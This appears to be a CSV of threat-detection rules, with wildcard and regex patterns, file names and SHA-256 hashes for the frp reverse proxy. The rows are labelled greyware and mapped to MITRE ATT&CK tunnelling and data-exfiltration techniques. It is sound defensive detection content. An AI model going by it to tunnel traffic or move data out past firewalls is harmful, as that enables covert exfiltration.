"*\frp_0.*.*_linux_amd64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_linux_arm.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_arm\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_linux_arm64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_linux_mips.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_mips\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_linux_mips64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_mips64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_linux_mips64le.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_mips64le\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_linux_mipsle.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_mipsle\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frpc.exe*",".{0,1000}\\frpc\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frps.exe*",".{0,1000}\\frps\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*00c526bdfae8fe448b1810c1c06b2827efa1158b7e324aa69c23a57a8b29f603*",".{0,1000}00c526bdfae8fe448b1810c1c06b2827efa1158b7e324aa69c23a57a8b29f603.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*00ffd863c32645660a29db758db4ea89f7c3eb616b3488cceca55345d8a5d11d*",".{0,1000}00ffd863c32645660a29db758db4ea89f7c3eb616b3488cceca55345d8a5d11d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0108697c36c88f6ae776f923064236f4e890f3c887a94e798222e5ba3c08c568*",".{0,1000}0108697c36c88f6ae776f923064236f4e890f3c887a94e798222e5ba3c08c568.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*025bf967e37ce095f31bc45d886156d365a0e9dc7aa0e7f3bbc91bd1c9717145*",".{0,1000}025bf967e37ce095f31bc45d886156d365a0e9dc7aa0e7f3bbc91bd1c9717145.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*02a4baaefa38ed6bed90fd59076be5eceab98f6d08a83aa3b459e160299389e2*",".{0,1000}02a4baaefa38ed6bed90fd59076be5eceab98f6d08a83aa3b459e160299389e2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*02ebe0a81dac898bf7bfced875656ec1f05b4eeaf4ba704c8a2b6c88582026ab*",".{0,1000}02ebe0a81dac898bf7bfced875656ec1f05b4eeaf4ba704c8a2b6c88582026ab.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*030544b09aff990592772ae508a62396c5648a267a14e5f2fad08324c3d9eb9a*",".{0,1000}030544b09aff990592772ae508a62396c5648a267a14e5f2fad08324c3d9eb9a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0314135de58db11f0c6f360113b3f76735e20a7b3cdb928f9acdb0a82ce927e0*",".{0,1000}0314135de58db11f0c6f360113b3f76735e20a7b3cdb928f9acdb0a82ce927e0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*03dae058d9b192aab4e119e620c40253f7693bfae095820ddd0313403d207d82*",".{0,1000}03dae058d9b192aab4e119e620c40253f7693bfae095820ddd0313403d207d82.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*03fce0574a2df7993efff8bf3d1e45250b08692081cff53dfd266745db772f27*",".{0,1000}03fce0574a2df7993efff8bf3d1e45250b08692081cff53dfd266745db772f27.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*042fa197c0f91b27404c086eabfb62dad3ffaaad7101046f518abf58ae42ee1b*",".{0,1000}042fa197c0f91b27404c086eabfb62dad3ffaaad7101046f518abf58ae42ee1b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*043cd981e81f756123ea4501569ad8d1fbb8166d1046b349ca423aa6ddc0ce31*",".{0,1000}043cd981e81f756123ea4501569ad8d1fbb8166d1046b349ca423aa6ddc0ce31.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0476f68f4552ae460d72f0b6c2c9fd4b6fb8dfdbafdec62695f02996d7221f81*",".{0,1000}0476f68f4552ae460d72f0b6c2c9fd4b6fb8dfdbafdec62695f02996d7221f81.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*04d9eaf4997d1407feca0324beedaca577c63fa900ef04e6a97de9e8e2391e34*",".{0,1000}04d9eaf4997d1407feca0324beedaca577c63fa900ef04e6a97de9e8e2391e34.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*05cea2ca577a0dc7a1b8e6393547442174c1035818791f2a4e784471ab9dfcf0*",".{0,1000}05cea2ca577a0dc7a1b8e6393547442174c1035818791f2a4e784471ab9dfcf0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*05e2ba6184dcebe6fa334c2a1d4534433e8ff9372636ff98eef96e414212903c*",".{0,1000}05e2ba6184dcebe6fa334c2a1d4534433e8ff9372636ff98eef96e414212903c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0679e059dfca6cd022caf808ffe2709207377463a31ccddee1bcb75c161b341c*",".{0,1000}0679e059dfca6cd022caf808ffe2709207377463a31ccddee1bcb75c161b341c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*076d9ce5c8644dbeb313e2d90349ad33d3b718b2701899480573266b3f6f0e6a*",".{0,1000}076d9ce5c8644dbeb313e2d90349ad33d3b718b2701899480573266b3f6f0e6a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*07a0651b2053508bab9370df884096effa653cb24cfd8c454c438b15971ece63*",".{0,1000}07a0651b2053508bab9370df884096effa653cb24cfd8c454c438b15971ece63.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*081e0f8ba995218e30ad3c0fa7a12493f17dcbbbac73fdae4391fddf8af2f918*",".{0,1000}081e0f8ba995218e30ad3c0fa7a12493f17dcbbbac73fdae4391fddf8af2f918.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*084d3c601a9f5d100ad3be26d94b643f2843fa64dcc5f2f2057c612bf7f9d4f1*",".{0,1000}084d3c601a9f5d100ad3be26d94b643f2843fa64dcc5f2f2057c612bf7f9d4f1.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*08589a1a9ab1159cdd8a156c28bf19b64c0587bd9a415affd19a15ea86441d06*",".{0,1000}08589a1a9ab1159cdd8a156c28bf19b64c0587bd9a415affd19a15ea86441d06.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*09329200234dd56722e095ee5b0b3d31bf8d39f3bdacb4a473b9144a7e8e8b7d*",".{0,1000}09329200234dd56722e095ee5b0b3d31bf8d39f3bdacb4a473b9144a7e8e8b7d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0950dbcd22a110b50c7636f2ff7ca73ee120568d375d75539546c6590cd75ce9*",".{0,1000}0950dbcd22a110b50c7636f2ff7ca73ee120568d375d75539546c6590cd75ce9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*09e451ce640afddb9ba25ed619bf2b26b8d080dbf3d09a3ac22f4d365d7832d3*",".{0,1000}09e451ce640afddb9ba25ed619bf2b26b8d080dbf3d09a3ac22f4d365d7832d3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0ac137ea9061aea6b6e8e5fc228b1082e14d3e29cafe6103f542ac4ffd728843*",".{0,1000}0ac137ea9061aea6b6e8e5fc228b1082e14d3e29cafe6103f542ac4ffd728843.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0b938c1c8389829602f511b4d8ebbe8f6d2ae6fb4e5a88540b1699c922a63610*",".{0,1000}0b938c1c8389829602f511b4d8ebbe8f6d2ae6fb4e5a88540b1699c922a63610.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0bf96f473385bbeb64faad3caec3ad721187b328f2228820e49838e187da0e22*",".{0,1000}0bf96f473385bbeb64faad3caec3ad721187b328f2228820e49838e187da0e22.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0ccc051693da612b7c4eed265598d3c8878019cb21e6ec9e3869f94b93e6ca80*",".{0,1000}0ccc051693da612b7c4eed265598d3c8878019cb21e6ec9e3869f94b93e6ca80.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0cd33dcfe9a38441eda2c60675f05ab3c3875b1e54608583d50d0835c567a30e*",".{0,1000}0cd33dcfe9a38441eda2c60675f05ab3c3875b1e54608583d50d0835c567a30e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0d05e3ebd2490c026e1b8f6780d901eedde65562af02acf3bf80d729a2aae52b*",".{0,1000}0d05e3ebd2490c026e1b8f6780d901eedde65562af02acf3bf80d729a2aae52b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0e8f1915a1e2b1b2d37b11e831e49fb5f5fc2a14eea086f7ea5a1e4112095728*",".{0,1000}0e8f1915a1e2b1b2d37b11e831e49fb5f5fc2a14eea086f7ea5a1e4112095728.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0f7acf26d92d39a2e3965ee91bf60e7c331844a1d7e81078ede526cf0459eccd*",".{0,1000}0f7acf26d92d39a2e3965ee91bf60e7c331844a1d7e81078ede526cf0459eccd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*0fd011fb817fa36fe8735e3d97df523970d9be4f56f0848840f737b63ba37fbf*",".{0,1000}0fd011fb817fa36fe8735e3d97df523970d9be4f56f0848840f737b63ba37fbf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1084631215170fc83b2de13f156a3b0e2ea02f2a0955fc94d3c6c5015391922c*",".{0,1000}1084631215170fc83b2de13f156a3b0e2ea02f2a0955fc94d3c6c5015391922c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*11f2af35bdaa799a38a180a1b73083d68843cf731ecea118a33597a14289589e*",".{0,1000}11f2af35bdaa799a38a180a1b73083d68843cf731ecea118a33597a14289589e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*125f87d334addd8ec7dacaf2a321a9f1c9a8b31c8a673d2d02808162cd67f997*",".{0,1000}125f87d334addd8ec7dacaf2a321a9f1c9a8b31c8a673d2d02808162cd67f997.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*13102618f84a2efa07a90733d9bae72e48b897c29f4df4b38bdacebb99517e52*",".{0,1000}13102618f84a2efa07a90733d9bae72e48b897c29f4df4b38bdacebb99517e52.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*136cc6be28c798b2493875f498b5956a876c24cdbd028773aa9194c8bd846442*",".{0,1000}136cc6be28c798b2493875f498b5956a876c24cdbd028773aa9194c8bd846442.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*13ac5e018ec166c098c2d67635068ad1b18247aaf02a8537532f52b4fda2dd29*",".{0,1000}13ac5e018ec166c098c2d67635068ad1b18247aaf02a8537532f52b4fda2dd29.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*13f227bc915c43961e1f3831f155c6934e7d5a65434af3b29bf494b1d5d276b7*",".{0,1000}13f227bc915c43961e1f3831f155c6934e7d5a65434af3b29bf494b1d5d276b7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*140fc748db03438c09c3fe5def7e4ef2b273462d567a851addc97728fc8a2fcd*",".{0,1000}140fc748db03438c09c3fe5def7e4ef2b273462d567a851addc97728fc8a2fcd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1411f74ca4f05e63963448b9d0c972e16cbf98ba81864e1c04de0492ebd0c6fa*",".{0,1000}1411f74ca4f05e63963448b9d0c972e16cbf98ba81864e1c04de0492ebd0c6fa.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*14c37cbee05947b2c67fe8064c132652b363c8b0d72fa401ddaf93efdc9538e3*",".{0,1000}14c37cbee05947b2c67fe8064c132652b363c8b0d72fa401ddaf93efdc9538e3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*176cc43f9796b4b47ad831a03ef5093fbe954caa2a088e136941aea93e0f6a70*",".{0,1000}176cc43f9796b4b47ad831a03ef5093fbe954caa2a088e136941aea93e0f6a70.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1837335417e0bfa4c1caf7ce94047e1ba8020983c246b25679dc5efced9dae75*",".{0,1000}1837335417e0bfa4c1caf7ce94047e1ba8020983c246b25679dc5efced9dae75.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*183ee0c672409cdd8b421f31e2b81753a4713bee962e1edf97f1455cda97173d*",".{0,1000}183ee0c672409cdd8b421f31e2b81753a4713bee962e1edf97f1455cda97173d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*184669dc9168ac60ebc0afc08ca54473d9e6de933b731cb914f5d4ad836516c4*",".{0,1000}184669dc9168ac60ebc0afc08ca54473d9e6de933b731cb914f5d4ad836516c4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*18740144d6c91dea850c695590973733ababc0634ca18073d2faec296f572b07*",".{0,1000}18740144d6c91dea850c695590973733ababc0634ca18073d2faec296f572b07.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*18b6a345f7d4fb9250b8d751a99f58a0a2daace02a1f7a4e7bb567237e681335*",".{0,1000}18b6a345f7d4fb9250b8d751a99f58a0a2daace02a1f7a4e7bb567237e681335.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
